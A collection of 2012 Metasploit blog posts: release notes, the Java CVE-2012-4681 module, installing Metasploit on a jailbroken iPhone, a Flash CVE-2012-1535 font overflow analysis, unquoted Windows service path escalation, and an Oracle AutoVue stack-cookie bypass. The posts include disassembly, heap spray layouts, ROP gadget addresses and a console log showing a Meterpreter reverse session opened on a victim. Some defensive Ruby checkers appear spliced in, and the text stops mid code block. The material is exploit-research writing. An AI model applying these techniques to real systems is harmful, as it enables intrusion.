Time to chalk up one more victory for the forces of goodness and light in our struggle against secret 0-day.

 

Java 0-Day Exploit Shipped

 

If you pay any attention at all to the usual security news, you will have certainly already heard about how Accuvant's Josh "jduck" Drake and the Metasploit dev community pounced on the Java 0-Day, aka CVE-2012-4681, aka the Java 7 Applet RCE vulnerability. We shipped this module earlier this week by updating last week's update, mainly so Metasploit Community and Pro users could start testing right away. Of course, it's in this week's normal update as well, and in fact, this version has a much more current description of the bug in light of the ongoing research performed here over the days that followed our initial release.

 

In a moment of foreshadowing, it was last week's blog post where I mentioned that "not everyone can scoop up samples of current malware," when explaining Metasploit's position on offensive security testing. I think this Java exploit is a perfect case in point. If it wasn't for jduck's inspired detective work, followed up by the R&D work in the Metasploit community that led to this module, we might still be wondering what FireEye was talking about in their cryptic blog post. In other words, this experience just reaffirms to me that open and public exploits beat out secret and private warez kits every time. Today, we all know about the problem, we can all work toward solutions, and in the end, we can shut down this vector months ahead of anyone's schedule.

 

You can check your exposure to this vulnerability right this moment by either downloading Metasploit or checking in on our detection site, IsJavaExploitable.com.

 

Update: Oracle has released Java 7u7 which appears effective against CVE-2012-4681. We're looking at it today to see if there's a bypass.

 

Meterpreter Arp and Netstat

 

In addition to the hoopla around Java, this release also includes two new commands for Meterpreter: netstat and arp. Both are similar to the Unix commands of the same name, providing information about current networking goings on. This kind of thing can be invaluable for figuring out the role of the current machine and for discovering new targets. Thanks to community contributor mephos for sending in the patch.

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Exploit modules

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see the most excellent release notes.

On late Sunday night, the Metasploit Exploit team was looking for kicks, and heard the word on the street that someone was passing around a reliable Java 0-day exploit. Big thanks to Joshua J. Drake (jduck): we got our hands on that PoC, and then once again started our voodoo ritual. Within a couple of hours, we had a working exploit. Download Metasploit here, and apply the latest update to pick up the exploit.

 

Java zero-day vulnerability exploit in Metasploit

 

The above example is a successful attack against a fully patched Windows 7 SP1 with Java 7 Update 6.  We have also tested the module against the following environments:

  • Mozilla Firefox on Ubuntu Linux 10.04
  • Internet Explorer / Mozilla Firefox / Chrome on Windows XP
  • Internet Explorer / Mozilla Firefox on Windows Vista
  • Internet Explorer / Mozilla Firefox on Windows 7
  • Safari on OS X 10.7.4

 

As a user, you should take this problem seriously, because there is currently no patch from Oracle.  For now, our recommendation is to completely disable Java until a fix is available.  NOTE: A fix is now available (Java 7 Update 7), please patch your system ASAP!

 

To try out this exploit: Get your free Metasploit download now, or update your existing installation.  Meanwhile, we will keep this blog updated when more progress has been made.

 

---

Aug 28 2012: This vulnerability has been assigned as CVE-2012-4681.

Aug 30 2012: Oracle has released Java 7 Update 7

After the last couple of bumper crops of exploits, having merely six new modules this week is kind of a relief, at least from an editing standpoint. Of course, one of them is for a fresh Adobe Flash exploit, so let's jump into that.

 

Flash Malware Module

 

This week's update features an exploit for Adobe Flash, which Metasploit exploit developers Wei "sinn3r" Chen and Juan Vazquez wrote about last week. Since that blog post, there have been a few updates to add in more valid targets -- the current version should successfully exploit unpatched systems running Internet Explorer 6, 7, 8, and 9, tested across Windows XP SP3, Vista SP2, and Windows 7 SP1.

 

This variety of targets Metasploit provides is one reason why the work sinn3r and Juan do in porting live malware to Metasploit modules is so critical. Let's say you're running an IT department and you don't have complete control over the desktops in your network -- which is of course pretty much every network not running hyper-secure NAC. Since you can't patch everyone, you might rely on anti-virus (AV), intrusion protection (IPS), or application proxies to protect your constituents from getting nailed by the original exploit. However, it's difficult to know if these defenses are any good at all against variants -- in other words, you generally can't know if your AV/IPS/Proxy is merely "covering the exploit," or if they're "covering the vulnerability." With the Metasploit exploit and its varied targets, you can test your own defensive gear pretty rapidly.

 

Incidentally, not everyone can scoop up samples of current malware, nor is it advisable to go monkeying around with known-evil code without doing a lot of prep work first. In that vein, using Metasploit exploits as a proxy for the bad guys turns out to be way more convenient, not to mention about a million times safer. Go offensive security!

 

HTTP Client Trickery

 

Speaking of testing your own environment, this update also has a couple of new auxiliary modules that can facilitate testing your users on their password management skills. The first, HTTP Client Basic Authentication Credential Collector by community contributor "saint patrick," is a pretty straightforward credential collector -- it simulates a web server that asks for a username and password. You'd be surprised at how often people will just start typing in a username/password combination when given the opportunity. Of course, if you're a cynical IT security hack, you won't be surprised at all.

 

The other is an HTTP Client MS Credential Relayer by community contributor Rich Lundeen. This attack is a little more involved: after picking up a set of credentials over HTTP, this module gives you the capability to turn around and immediately replay them against either another HTTP server or an SMB server. This attack isn't new, but bringing this implementation to Metasploit in a modular way is great news.

 

Thanks to both of you guys for your unconnected-but-related work this week!

 

Extending JBOSS Targets

 

Finally, this week sees the culmination of a bunch of work from community contributor h0ng10 in improving Metasploit's support for targeting JBoss application servers. You can read the storied details and testing that happened along the way on Pull Request #663, but the end result is, we now have Meterpreter payload support for all three of our current JBoss exploits. That's pretty sweet, so thanks for your work on this, h0ng10!

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Auxiliary modules

 

Exploit modules

 


Have you ever wanted to run an exploit but found yourself away from your desk? Wouldn't it be awesome if you could launch a full version of the Metasploit Framework from your phone or tablet? As you might have guessed, now you can. With an adventurous spirit and a few commands, you can be running the Metasploit Framework on your iPad or iPhone in just a few short minutes.

 

Warning: To install Metasploit, you’ll need root access to your device – which is accomplished by following your favorite jailbreaking procedure. I used Absinthe (http://absinthejailbreak.com/). Jailbreaking can potentially cause problems for you and your device, and will void the warranty. You assume all risk when altering your device(s). However, if you are installing Metasploit, you probably already enjoy breaking things. :-)

 

Once you have root, you will need the following:

  • OpenSSH server (via Cydia)
  • apt [APT 0.7+ Strict] (via Cydia)
  • SSH client (I use iSSH; via App Store)

 

First, make sure everything is updated and that you have subversion installed:


apt-get update

apt-get dist-upgrade

apt-get install wget subversion

 


 

Once that’s done, we’ll need to grab Ruby and iOS dependencies for Metasploit Framework to run. As of this writing, the files needed were kindly hosted over at iNinjas:

 

wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb

wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb

wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

 


Install the packages:


dpkg -i iconv_1.14-1_iphoneos-arm.deb

dpkg -i zlib_1.2.3-1_iphoneos-arm.deb

dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

 

Once the dependencies have finished installing, you can safely delete those files to save space on your iDevice. Presuming these are the only .deb files you have downloaded, you can run rm -rf *.deb. If you’ve been tinkering around with other files, just replace the * with the file names you want to remove.

 

If you want to double-check that everything installed correctly, you should be able to see Ruby version 1.9.2 by running the ruby -v command.

 

Now the good part! I installed Metasploit Framework to /private/var/msf3. In case you are unfamiliar, /private/var is the partition where your apps, media and settings are all stored by default, so it’s easily the larger of the two default partitions on your iDevice.

 

We’re going to use svn to grab the Metasploit Framework trunk, for the sake of simplicity and to avoid compatibility issues:

 

cd /private/var

svn co https://www.metasploit.com/svn/framework3/trunk/ msf3

 


 

Once that’s done, cd to msf3/ and launch the Metasploit Framework!

 

ruby msfconsole

 

Happy exploiting!

 


 

---

Co-written/Developed by Andrew Spangler and James Kirk

Edit: Aug 26 2012.


Recently, a new Adobe Flash vulnerability (CVE-2012-1535) was being exploited in the wild as a zero-day in limited targeted attacks, in the form of a Word document.  The Metasploit team managed to get our hands on the malware sample, and began our voodoo ritual in order to make this exploit available in the Metasploit Framework.  Although Adobe has already officially released a patch (APSB12-18), and the malware is pretty well documented, the vulnerability itself isn't (well, at least not in English), so we figured it's time to update the blog.


When we began analyzing the malicious Flash object file, we realized the vulnerability should be related to the parsing of the embedded font file, because of the following source code:


public function TextBlock_createTextLineExample():void{
  var _local1 = "Edit the world in hex.";
  var _local2:FontDescription = new FontDescription("PSpop");
  _local2.fontLookup = FontLookup.EMBEDDED_CFF;
  var _local3:ElementFormat = new ElementFormat(_local2);
  _local3.fontSize = 16;
  var _local4:TextElement = new TextElement(_local1, _local3);
  var _local5:TextBlock = new TextBlock();
  _local5.content = _local4;
  this.createLines(_local5);
}


private function createLines(_arg1:TextBlock):void{
  var _local2:Number = 300;
  var _local3:Number = 15;
  var _local4:Number = 20;
  var _local5:TextLine = _arg1.createTextLine(null, _local2);
  while (_local5) {
    _local5.x = _local3;
    _local5.y = _local4;
    _local4 = (_local4 + (_local5.height + 2));
    addChild(_local5);
    _local5 = _arg1.createTextLine(_local5, _local2);
  };
}


When this font file is loaded, we trigger a clean crash similar to the following:


(538.7dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\Macromed\Flash\Flash32_11_3_300_268.ocx -
eax=1e0d0000 ebx=1e0cfff0 ecx=000004f7 edx=00000000 esi=02a7dfa0 edi=02a78250
eip=1044168a esp=0013dd20 ebp=0013dd58 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050206
Flash32_11_3_300_268!DllUnregisterServer+0x285c28:
1044168a ff5008          call    dword ptr [eax+8]    ds:0023:1e0d0008=????????


A quick look in IDA Pro reveals EAX comes from arg_0:


.text:103EF2D0                mov    esi, [esp+4+arg_0] <-- ESI read from arg_0
.text:103EF2D4                test    esi, esi
.text:103EF2D6                jz      short loc_103EF2EB
.text:103EF2D8                push    dword ptr [esi+0Ch]
.text:103EF2DB                mov    eax, [esi]        <-- EAX read from ESI
.text:103EF2DD                push    eax
.text:103EF2DE                call    dword ptr [eax+8]  <-- Crash

 

And a quick cross-reference brings us to this particular call:

 

Down p sub_103EF4A0+19B call    sub_103EF2CF    ; Call crashing function

 

Where sub_103EF4A0+19B  points to the following:

 

.text:103EF63A loc_103EF63A:                          ; CODE XREF: sub_103EF4A0+A3 j
.text:103EF63A                push    esi
.text:103EF63B                call    sub_103EF2CF    ; Call crashing function

 

At this point, we know there is some kind of corruption in ESI... but what's ESI for?  Here, we trace ESI by first "decompiling" the entire function, and then grep 'v6' (ESI):


$ grep -n v6 sub_103ef4a0.txt
6:  int v6; // esi@6
43:    v6 = (*a1)(a1, 16);
44:    v16 = v6;
45:    if ( !v6 )
50:    *(v6 + 8) = streama;
51:    *v6 = a1;
52:    *(v6 + 4) = v3;
54:    *(v6 + 12) = v7;
59:      sub_103EF2CF(v6);    


As you can see, at line 43, ESI is assigned a value.  Turns out this is where the function allocates memory (which we later discovered to be the kern table memory):


.text:103EF4ED loc_103EF4ED:                          ; CODE XREF: sub_103EF4A0+37 j
.text:103EF4ED                pop    ebx
.text:103EF4EE                cmp    [ebp+stream], esi
.text:103EF4F1                jz      loc_103EF655
.text:103EF4F7                mov    eax, [ebp+arg_0]
.text:103EF4FA                push    10h
.text:103EF4FC                push    eax
.text:103EF4FD                call    dword ptr [eax] ; Allocate memory
.text:103EF4FF                mov    esi, eax


We will call the above "memory 1", because there's another one ("memory 2") that comes pretty much right after:


.text:103EF514 loc_103EF514:                            ; CODE XREF: sub_103EF4A0+68 j
.text:103EF514                mov    eax, [ebp+stream]
.text:103EF517                mov    ecx, [ebp+arg_0]  ;[arg_0] is our allocator
.text:103EF51A                mov    [esi+8], eax
.text:103EF51D                shl    eax, 4
.text:103EF520                push    eax
.text:103EF521                push    ecx
.text:103EF522                mov    [esi], ecx
.text:103EF524                mov    [esi+4], edi
.text:103EF527                call    dword ptr [ecx]
.text:103EF529                pop    ecx
.text:103EF52A                pop    ecx
.text:103EF52B                xor    ecx, ecx
.text:103EF52D                mov    [esi+0Ch], eax


In the above code, EAX is a user-controlled value, and is used as the size.  In our case, this value is always 0x10000000, and when the code does a "SHL EAX, 4", EAX becomes 0x00 -- an integer overflow.  Here's an experiment you can try in IRB that demonstrates the same effect:


ruby-1.9.2-p180 :006 > [0x10000000 << 4].pack("V*").unpack("H*")
=> ["00000000"]

 

Again, since 0x10000000 is user-controlled, we need to find out where it comes from.  We know that the crash occurs when the font is loaded, so we'll begin searching there:


$ d3v_binary_search.rb -i PSPop.otf -p 10000000 |grep HERE
00007800  00 02 00 09 00 03 00 09 00 00 00 10 00 00 00 10  |................|     


The first offset (around 0x7800) doesn't seem to point to anything interesting.  But the second one (0x8340), according to our TTF template in 010 Editor, falls into the "kern" header section:

 

struct tTable Table[8]    kern (1801810542)    at 33604 for 15852
    ULONG checkSum        A466AE58h
    ULONG offset          8344h
    ULONG length          3DECh


According to the TTF specifications, the 'kern' header has the following fields:

 

Type       Name      Description
fixed32    version   The version number of the kerning table (0x00010000 for the current version).
uint32     nTables   The number of subtables included in the kerning table.


So at around 0x8340, here's how we should interpret the binary data:


$ cat PSPop.otf |hexdump -C |grep 00008340
00008340  00 00 00 00 00 01 00 00  10 00 00 00 1e 0c ff e8  |................|
                         ^Version  ^ nTables

 

At this point, we understand that when the version is 0x10000 and nTables has a value of 0x10000000 or higher, an integer overflow occurs for memory 2.  With a few well-placed breakpoints, we learned that memory 2 is always allocated before memory 1.  And a before/after memory dump comparison reveals the overflow:
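The truncation the IRB snippet above shows, together with the kern header interpretation just described, written up as a defensive font checker. This is an added example, not code from the original post or from Metasploit: the table-directory parsing follows the standard sfnt layout, the 16-byte slot size mirrors the "shl eax, 4" in the disassembly, and build_sample_font constructs sample bytes rather than reading a real font.

```ruby
# Added example (not Metasploit code): locate the 'kern' table in an
# sfnt-based font (OTF/TTF) and recompute the size the vulnerable Flash code
# derived from nTables ("nTables << 4"), both as an unbounded integer and
# wrapped to 32 bits, so the CVE-2012-1535 trigger is visible before the
# font ever reaches a parser.

SFNT_HEADER_SIZE  = 12   # sfntVersion(4) numTables(2) searchRange(2) entrySelector(2) rangeShift(2)
TABLE_RECORD_SIZE = 16   # tag(4) checkSum(4) offset(4) length(4)
KERN_SLOT_SIZE    = 16   # bytes per subtable slot, matching the "shl eax, 4" in the disassembly
U32_MASK          = 0xFFFFFFFF

# Parses the table directory and returns { "tag" => { offset:, length: } }.
def sfnt_table_directory(font)
  raise ArgumentError, "too short to be an sfnt font" if font.bytesize < SFNT_HEADER_SIZE
  num_tables = font.byteslice(4, 2).unpack1("n")           # big-endian uint16
  directory = {}
  num_tables.times do |i|
    record = font.byteslice(SFNT_HEADER_SIZE + i * TABLE_RECORD_SIZE, TABLE_RECORD_SIZE)
    raise ArgumentError, "truncated table directory" if record.nil? || record.bytesize < TABLE_RECORD_SIZE
    tag, _checksum, offset, length = record.unpack("a4NNN")
    directory[tag] = { offset: offset, length: length }
  end
  directory
end

# Reads the kern header (fixed32 version, uint32 nTables) and reports whether
# nTables * 16 survives a 32-bit size computation.
def analyze_kern(font)
  kern = sfnt_table_directory(font)["kern"]
  return { present: false } unless kern
  header = font.byteslice(kern[:offset], 8)
  raise ArgumentError, "kern table truncated" if header.nil? || header.bytesize < 8
  version, n_tables = header.unpack("NN")                   # both big-endian uint32
  requested = n_tables * KERN_SLOT_SIZE                     # what the allocator should be asked for
  wrapped   = requested & U32_MASK                          # what a 32-bit "shl eax, 4" actually yields
  {
    present:        true,
    version:        version,
    n_tables:       n_tables,
    requested_size: requested,
    wrapped_size:   wrapped,
    overflow:       requested != wrapped,
    # More subtables than bytes in the table is impossible for a well-formed font.
    implausible:    n_tables > kern[:length],
  }
end

# Builds a constructed minimal font with a single 'kern' table (sample data
# for running offline; not a real font file).
def build_sample_font(n_tables, version = 0x00010000)
  kern_offset = SFNT_HEADER_SIZE + TABLE_RECORD_SIZE
  kern_body   = [version, n_tables].pack("NN") + "\x00".b * 8
  header      = ["OTTO", 1, 16, 0, 0].pack("a4nnnn")        # one table in the directory
  record      = ["kern", 0, kern_offset, kern_body.bytesize].pack("a4NNN")
  (header + record + kern_body).b
end

if __FILE__ == $0
  # nTables = 0x10000000 is the value the post finds at offset 0x8348 of PSPop.otf.
  p analyze_kern(build_sample_font(0x10000000))
  p analyze_kern(build_sample_font(2))
end
```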

 

Memory 2:

 

Location     Before                                               After
0x03a69058   54 90 A6 03 00 00 00 00 00 00 00 00 00 00 00 00 00    00 00 00 00 08 00 00 00 08 00 00 00 00 00 00 00 00
0x03a6906a   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    00 00 F0 FF 0C 1E 00 00 0D 1E FF FF FF FF 00 00 00
0x03a6907c   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    F0 FF 0C 1E 00 00 0D 1E FF FF FF FF 00 00 00 00 F0
0x03a6908e   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    0C 1E 00 00 0D 1E FF FF FF FF 00 00 00 00 F0 FF 0C
0x03a690a0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    00 00 0D 1E FF FF FF FF 00 00 00 00 F0 FF 0C 1E 00

 

Memory 1 -- Notice the first two rows are overwritten, with the first 4 bytes being the pointer to our shellcode:

 

Location     Before                                               After
03a6d750     B0 C1 A6 03 50 82 A6 03 00 00 00 10 00 00 00 00 70    00 00 0d 1E FF FF FF FF 00 00 00 00 F0 FF 0C 1E 00
03a6d762     A6 03 2E 31 2E 33 00 00 00 00 00 00 00 00 B0 D7 A6    0d 1E FF FF FF FF 00 00 00 00 00 00 00 00 B0 D7 A6
03a6d774     50 D1 A6 03 80 D8 A6 03 00 00 00 00 2F 6E 54 41 48    50 D1 A6 03 80 D8 A6 03 00 00 00 00 2F 6E 54 41 48
03a6d786     2E 74 78 74 2E 73 77 66 00 00 38 4F AA 03 80 D8 A6    2E 74 78 74 2E 73 77 66 00 00 38 4F FF 03 80 D8 A6
03a6d798     00 00 00 00 00 00 00 00 c0 D6 A6 03 00 00 00 00 00    00 00 00 00 00 00 00 00 C0 D6 A6 03 00 00 00 00 00

 

Eventually, ESI points to 0x03a6d750, and when the following executes, we gain code execution:

 

.text:103EF2DB                mov    eax, [esi]  ;0x03A6D750
.text:103EF2DD                push    eax
.text:103EF2DE                call    dword ptr [eax+8]

 

Unlike the original malware, the Metasploit module for CVE-2012-1535 delivers the attack as a browser exploit.  And it currently supports Internet Explorer 6/7/8/9, Windows XP SP3 all the way to Windows 7 SP1.  It specifically has ROP chains (in order to bypass Data Execution Prevention) for the following Flash builds under XP, otherwise it defaults to JRE ROP as "plan B":

 

  • Flash 11.3.300.268
  • Flash 11.3.300.265
  • Flash 11.3.300.257

 

And here's an example of a successful assault against Windows 7 SP1:

 

msf  exploit(adobe_flash_otf_font) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.255.78:4444 
msf  exploit(adobe_flash_otf_font) > [*] Using URL: http://0.0.0.0:8080/xF
[*]  Local IP: http://10.6.255.78:8080/xF
[*] Server started.
[*] 10.6.255.89      adobe_flash_otf_font - User-agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.6.255.89      adobe_flash_otf_font - Client requesting: /xF
[*] 10.6.255.89      adobe_flash_otf_font - Sending HTML
[*] 10.6.255.89      adobe_flash_otf_font - User-agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.6.255.89      adobe_flash_otf_font - Client requesting: /HjSwC.txt.swf
[*] 10.6.255.89      adobe_flash_otf_font - Sending SWF
[*] 10.6.255.89      adobe_flash_otf_font - User-agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
[*] 10.6.255.89      adobe_flash_otf_font - Client requesting: /HjSwC.txt
[*] 10.6.255.89      adobe_flash_otf_font - Default back to JRE ROP
[*] 10.6.255.89      adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.6.255.89
[*] Meterpreter session 1 opened (10.6.255.78:4444 -> 10.6.255.89:49170) at 2012-08-22 15:28:26 -0500
[*] Session ID 1 (10.6.255.78:4444 -> 10.6.255.89:49170) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1216)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2380
[+] Successfully migrated to process

 

 

To try out this exploit: Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions. In the meantime, we'll keep working on this!


sinn3r & juan

Another week, another fifteen new modules for Metasploit. I continue to be amazed by the productivity of our open source exploit developer community. Thanks so much for your hard work and effort, folks!

 

New Module for Trusted Path Switcheroo

 

As I was going over this week's new modules, one that jumped out at me was Wei "sinn3r" Chen's implementation of a general Trusted Path insertion attack, Windows Service Trusted Path Privilege Escalation. I don't recall running into this attack scenario before, but of course, I don't live and breathe the Windows APIs like sinn3r does. Here's how it works, in a nutshell:

 

  • First, find a Windows service that is run in the context of LocalSystem.
  • Of those, find one whose service executable sits in an unquoted directory path that contains a space. For example, if a system service runs C:\Program Files\FooCompany\bar.exe (without specifying quotes), you're in.
  • Write your malicious executable to a path that mimics the path specifier up until the first space, and launch the service as normal.  In the above example, we'd write our executable to C:\Program.exe, so it will be run with the command argument of "Files\FooCompany\bar.exe".

 

That's pretty much the long and the short of it. Of course, you need the rights to both write to (perhaps) an arbitrary directory and the rights to start and stop services, but Power Users (and better) tend to have those rights by default. If you want to check the paths of all your running Windows processes, the easiest way is probably just firing up a command shell, and running "wmic PROCESS get CommandLine" and eyeballing that for anything missing quotes.
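One way to audit a host for the condition the list above describes, as an added example in Ruby that is not the module's own code: trusted_path_candidates and audit_services are hypothetical helper names, and SAMPLE_SERVICES is constructed data standing in for real service command lines such as the output of "wmic service get Name,PathName".

```ruby
# Added example (not Metasploit code): flag service command lines whose
# unquoted image path contains a space. For "C:\Program Files\FooCompany\bar.exe"
# Windows may try C:\Program.exe before the real binary, so every prefix that
# ends at a space is reported as a filename that must not be writable by
# unprivileged users.

# Returns the candidate filenames Windows would try before the intended
# executable, or an empty array when the command line is unambiguous
# (quoted, or no space anywhere in the directory path).
def trusted_path_candidates(command_line)
  cmd = command_line.strip
  return [] if cmd.start_with?('"')            # quoted image path: nothing to guess
  exe_end = cmd.downcase.index(".exe")
  return [] if exe_end.nil?                    # not a .exe image; out of scope here
  image = cmd[0, exe_end + 4]                  # path up to and including ".exe", arguments dropped
  parts = image.split(" ")
  return [] if parts.size < 2                  # no space in the path
  # Every prefix that ends at a space is a filename CreateProcess may try first.
  (1...parts.size).map { |i| parts[0, i].join(" ") + ".exe" }
end

# Runs the check over a { service_name => command_line } hash and keeps only
# the entries that need fixing (quote the ImagePath, or lock down the prefix).
def audit_services(services)
  services.each_with_object({}) do |(name, cmd), flagged|
    candidates = trusted_path_candidates(cmd)
    flagged[name] = candidates unless candidates.empty?
  end
end

# Constructed sample data standing in for real service command lines.
SAMPLE_SERVICES = {
  "FooSvc"      => 'C:\Program Files\FooCompany\bar.exe',
  "BarSvc"      => '"C:\Program Files\Bar Company\svc.exe" -run',
  "BazSvc"      => 'C:\Program Files\Baz Company\svc.exe -k baz',
  "EventSystem" => 'C:\Windows\system32\svchost.exe -k netsvcs',
}.freeze

if __FILE__ == $0
  audit_services(SAMPLE_SERVICES).each do |name, paths|
    puts "#{name}: unquoted path, Windows would first try #{paths.join(', ')}"
  end
end
```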

 

Stack Cookie Bypass Technique

 

Metasploit exploit developer Juan Vazquez brings us another technical deep-dive into his strategies for bypassing stack cookie protections that he used to exploit CVE-2012-0549 in his module Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow. If you are just getting started in exploit development on your own, Juan's blog posts have been a treasure trove of practical, hands-on wisdom.

 

New Modules

 

Here are the new modules -- for details and usage, follow the links to our Exploit Database.

 

Auxiliary modules

 

Exploit modules

 

Post modules

 


In this blog post we would like to share some details about the Oracle AutoVue exploit for CVE-2012-0549 which we've recently added to the Metasploit Framework.  This module exploits a buffer overflow flaw, discovered by Brian Gorenc.

 

The problem arises when you call the SetMarkupMode function from the AutoVue control (clsid B6FCC215-D303-11D1-BC6C-0000C078797F) with a long sMarkup parameter. The buffer overflow, even when triggered through an API from the AutoVue control, happens in AvMarkupX (AVMRkpX.ocx), where the Safe for Script and Safe for Init flags are set to false. The buffer overflow is due to the insecure usage of a strcpy-like function, using the controlled sMarkup parameter as source and a fixed-length stack buffer as destination:

 

.text:100123C5                 mov     ecx, edi
.text:100123C7                 call    ds:mfc90_910    ; call mfc90!CProperty::GetID
.text:100123CD                 push    eax             ; controlled data through the sMarkup parameter from SetMarkupMode
.text:100123CE                 lea     eax, [esp+44Ch+vulnerable_buffer_var_414]
.text:100123D2                 push    eax
.text:100123D3                 call    PanStrcpy

 

 

The PanStrcpy function is exported by the panio.dll DLL. It is just a strcpy implementation: bytes are copied from the area pointed to by source to destination until a null byte is found, without taking lengths into account:

 

int __stdcall PanStrcpy(int dst_arg_0, int src_arg_4)
{
  int v2; // ecx@1
  int result; // eax@1
  char v4; // dl@5

  v2 = src_arg_4;
  result = dst_arg_0;
  if ( src_arg_4 )
  {
    if ( dst_arg_0 )
    {
      do
      {
        v4 = *(_BYTE *)v2;
        *(_BYTE *)(dst_arg_0 - src_arg_4 + v2) = *(_BYTE *)v2;
        ++v2;
      }
      while ( v4 );
    }
  }
  else if ( dst_arg_0 )
  {
    *(_BYTE *)dst_arg_0 = 0;
  }
  return result;
}
Stack Cookies Bypass

 

While the vulnerability is straightforward to understand, exploitation is a little more tricky because the vulnerable function is protected by a stack cookie, checked before the ret:

 

.text:1001246A                 mov     ecx, [esp+438h+var_10]
.text:10012471                 xor     ecx, esp
.text:10012473                 call    @__security_check_cookie@4 ; __security_check_cookie(x)
.text:10012478                 add     esp, 438h
.text:1001247E                 retn    8

 

In a case like this, an SEH overwrite would be the first standard solution for the exploit. But this time the overwritten data on the stack is used in an interesting way between the overflow and the stack cookie check, and that can be used to get control of EIP.

 

Just before the stack cookie check, a call to the mfc90!CMFCRestoredTabInfo::~CMFCRestoredTabInfo destructor takes place:

 

.text:10012449                 lea     ecx, [esp+448h+arg_4]
.text:10012450                 call    ds:mfc90_601    ; call  mfc90!CMFCRestoredTabInfo::~CMFCRestoredTabInfo

 

Because of the overflow, the "this" pointer (ecx) can be controlled when CMFCRestoredTabInfo::~CMFCRestoredTabInfo is called. So let's check what happens inside this function. First of all, a CStringData from the object is going to be released:

 

.text:786E63B6 ; void __thiscall ATL__CSimpleStringT_char_1____CSimpleStringT_char_1_(ATL::CStringT > > *this)
.text:786E63B6 this = ecx
.text:786E63B6                 mov     eax, [this]     ; mfc90_598
.text:786E63B6                                         ; mfc90_599
.text:786E63B6                                         ; mfc90_600
.text:786E63B8                 sub     eax, 10h
.text:786E63BB                 jmp     ?Release@CStringData@ATL@@QAEXXZ ; ATL::CStringData::Release(void)
.text:786E63BB ??1?$CSimpleStringT@D$00@ATL@@QAE@XZ endp

 

Since we control the this pointer, we can control the CStringData pointer to be released, so we can go forward and take a look at CStringData::Release. The first part of the function retrieves a (reference?) counter from the CStringData and decrements it:

 

.text:7862FBA4 ; void __thiscall ATL__CStringData__Release(ATL::CStringData *this)
.text:7862FBA4                                         ; CODE XREF: CRuntimeClass::CreateObject(wchar_t const *)+31 p
.text:7862FBA4                                         ; CRuntimeClass::FromName(wchar_t const *)+27 p ...
.text:7862FBA4 this = eax
.text:7862FBA4                 lea     ecx, [this+0Ch]
.text:7862FBA7                 or      edx, 0FFFFFFFFh
.text:7862FBAA                 lock xadd [ecx], edx
.text:7862FBAE                 dec     edx
.text:7862FBAF                 test    edx, edx
.text:7862FBB1                 jg      short locret_7862FBBB

 

After the decrement, if the counter is 0, the next block of code is reached, which allows controlling a dynamic call:

 

.text:7862FBB3                 mov     ecx, [this]
.text:7862FBB5                 mov     edx, [ecx]
.text:7862FBB7                 push    this
.text:7862FBB8                 call    dword ptr [edx+4]

 

Remember, we control the CMFCRestoredTabInfo pointer. Therefore, if we make it point to a memory region whose contents are user-controlled (via a heap spray, for example), so will be the CStringData pointer and its reference counter, and finally the virtual function pointer.

 

In order to achieve exploitation in the easiest case (no DEP, no ASLR), the CMFCRestoredTabInfo pointer can be overwritten with the well-known 0x0c0c0c0c, and a specially crafted heap spray can easily be built to produce the following layout:

 

Address       Content       Comment
0x0c0c0bfc    0c0c0c0c      CStringData this pointer
0x0c0c0c08    1             CStringData reference counter
0x0c0c0c0c    0c0c0c0c      CMFCRestoredTabInfo this pointer
0x0c0c0c10    0c0c0c0c      CStringData virtual function pointer

 

In order to bypass DEP (and ASLR), the well-known ROP chain from msvcr71.dll of Java 6 is used; in that case a slightly different layout is needed:

 

Address       Content                           Comment
0x0c0c0bfc    0c0c0c0c                          CStringData this pointer
0x0c0c0c08    1                                 CStringData reference counter
0x0c0c0c0c    0c0c0c0c                          CMFCRestoredTabInfo this pointer
0x0c0c0c10    0x7c341ae4 (First Stack Pivot)    CStringData virtual function pointer

 

Once control is transferred to the first stack pivot, it fixes ESP to point to the controlled sMarkup data on the stack:

 

 

Address       Gadget
0x7c341ae4    ADD ESP, 48
              RETN


where a second stack pivot is located, to finally transfer execution to the ROP chain on the heap, after our specially crafted layout:

 

 

Address       Gadget           Purpose
0x7c3522ca    ADD EAX, 20      EAX stores the CStringData pointer, where a specially crafted object has been placed to get EIP control.
              RETN             Because of this an offset (0x20) is added, to point to clean controlled data. This is the reason for using a two-stage stack pivot.
0x7c348b05    XCHG EAX, ESP    Redirect ESP to the heap, where the ROP chain plus the shellcode have been placed via heap spray.
              RETN

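From the defensive side, the layout and gadget tables above give a content inspector something concrete to look for. The following is an added example, not code from the original post or from the Metasploit module: it decodes JavaScript unescape()-style %uXXXX strings the way the browser lays them out in memory and flags a large run of the 0x0c0c0c0c spray value or any of the three msvcr71.dll pivot addresses named above. The sample input at the bottom is constructed.

```python
import re
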